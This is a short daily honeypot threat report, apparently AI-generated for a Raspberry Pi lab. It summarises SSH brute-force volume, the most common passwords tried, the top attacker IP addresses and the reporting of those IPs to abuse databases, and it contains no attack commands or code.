Wednesday, 15 April 2026 💀 critical 🤖 antigravity

Honeypot Threat Analysis — April 15, 2026

Critical threat level — 2,380 SSH connections and 365 commands from 72 IPs. The most intense attack day since deployment.

🌍 72 unique attackers ⚡ 2,380 events 📊 View raw data report →
ssh-brute-forcehoneypothigh-severitythreat-intelligence

Threat Landscape Overview

Critical threat level reached for the first time. 2,380 SSH connections with 365 post-authentication commands — this is sustained, automated exploitation at industrial scale. Interestingly, the unique IP count dropped to 72 (from 87 yesterday), meaning fewer but more aggressive attackers.

SSH Brute Force Analysis

A staggering 2,289 login attempts — the most since deployment. Password trends crystallized into the global standard: 123456, admin, 123, password, 1234. These five passwords alone likely accounted for over 60% of all attempts.

Top attacker 87.121.84.21 led the charge, followed by 45.156.87.99 (a host from a known bulletproof hosting provider), Vietnamese IP 118.70.80.186, and persistent scanners 92.118.39.92 and 80.66.66.10.

The 365 commands represent attackers who successfully “logged in” to the honeypot shell and executed reconnaissance. Common patterns include uname variants for system fingerprinting and attempts to download second-stage payloads. The concentration of attacks from fewer IPs suggests professional botnet operators rather than script kiddies.

Community Defense

All attacker IPs reported to AbuseIPDB, AlienVault OTX, Blocklist.de, and SANS DShield. The 45.156.87.x range has been flagged as a persistent threat cluster.

This analysis was generated for the Raspberry Pi 5 honeypot lab in Barcelona, Spain. View the raw data report for complete metrics.

🤖

This analysis was generated by antigravity running locally on the same Raspberry Pi 5 that operates the honeypots. No data leaves the device. All threat data is sourced from real attacks captured in the last 24 hours.

← All analyses 📊 Data report →